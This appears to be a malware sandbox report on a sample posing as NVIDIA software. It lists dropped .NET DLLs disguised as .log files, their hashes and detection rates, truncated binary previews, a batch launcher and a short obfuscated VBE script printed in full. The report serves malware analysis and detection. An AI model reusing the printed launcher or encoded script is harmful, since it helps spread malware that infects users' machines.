Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................................. ........@.. ....................................@.................................`...K.......p............................................................................ ............... ..H............text........ ...................... ..`.rsrc...p...........................@....reloc..............................@..B........................H..................g..................................................0..........(.... ........8........E....q.......)...M...8l...(.... ....~....{....:....& ....8....(.... ....~....{o...:....& ....8....(.... ....~....{....:....& ....8z......0.......... ........8........E........h...%.......J...Y.......8....~....9.... ....8....r...ps....z...... ....~....{....:....& ....8....8.... ....8....8.... ....8w...~....([... .... .... ....s....~....(_....... ....~....{d...:7...& ...

C:\Users\user\AppData\Roaming\NVIDIA\RbwXTgCxu.bat

Download File

Process:	C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	87
Entropy (8bit):	5.040492134143617
Encrypted:	false
SSDEEP:	3:wGnjemBS2v1mnSVnV7hsQTAX0dI/DHAn:wGimg1nSNV7RdJn
MD5:	5EF72274BAA31B738A60E29492230464
SHA1:	CA7ED6A83325F6A117F5202E75F247230D5B3E5C
SHA-256:	7C42054D40B7C9C7023F90CE8407E3607BCC4B4DE9AFD260B8F497C6D9B3DE84
SHA-512:	9688BD293B912B625D61BB8F63B1A2F5FC1BA529B06E8536CB4CF77BECC4CD0D855C587BAA22275FCD0D49995A5DA36134C2CCB39A8F8435429E1885C8C21DF8
Malicious:	false
Preview:	%pcrRrVCLlyfKguc%%JUjNGITVTBI%..%uCBdj%"%AppData%\NVIDIA/NVIDIA Container.exe"%QoAcqhp%

C:\Users\user\AppData\Roaming\NVIDIA\WRqwjVLhswP6l4C4Fp0FJhl.vbe

Download File

Process:	C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe
File Type:	data
Category:	dropped
Size (bytes):	200
Entropy (8bit):	5.716884002715895
Encrypted:	false
SSDEEP:	6:GtkgwqK+NkLzWbHZEG8nZNDd3RL1wQJRZ7tZwAZQM:Gt2MCzWL6G4d3XBJr7nwIQM
MD5:	008EB899F204BEEFDAD0E3DD3D35E1FB
SHA1:	53BEC4EB9E3F2736419CA1384E137382498FB6E0
SHA-256:	DD0FB32578088488F558149719EC269D1F09DE6407EBE4D252A185ACAC0820E5
SHA-512:	E17D02C8C3C6F9068E6CC49F7E4EEA5F769859DE81F5B4172085228FB683B5D6499F2CB196BF069B75E3965B4776F86D8FCC4338B8E1804ECEE40BA093304770
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	#@~^rwAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v&T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~Ju)aw9mYm]zg.&9qzz&I(hpPTZ6! 4mYJB~T~,0mVd+WjYAAA==^#~@.

C:\Users\user\Desktop\AAjFTaDk.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Joe Sandbox View:	Filename: GameHackBuild1.exe.bin.exe, Detection: malicious, Browse Filename: XenoSetup(2).exe.bin.exe, Detection: malicious, Browse Filename: SAMP_CHEAT_ATVECHAU2.exe.bin.exe, Detection: malicious, Browse Filename: SPISOK_DENEG.exe, Detection: malicious, Browse Filename: ElixirInjector.exe, Detection: malicious, Browse Filename: DCobxod.exe, Detection: malicious, Browse Filename: fatality.exe, Detection: malicious, Browse Filename: NursultanAlphaCrack.bat.exe, Detection: malicious, Browse Filename: SearchIndexer.exe, Detection: malicious, Browse Filename: fatality.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\AOEnQqnj.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\AVNUZtIi.log

Download File

Process:	C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\BlhnJSvN.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\CTevJfQr.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\DSPMVDWa.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\DaiMBcDs.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\DnVLkBOS.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\GwjbnDUU.log

Download File

Process:	C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\HbFMikPW.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\IMSbQhuH.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\IyVKJmYP.log

Download File

Process:	C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\JOqdsLLu.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\JesvDTTS.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\JfykNhTG.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\LxmktYfY.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\NBjcEgcI.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
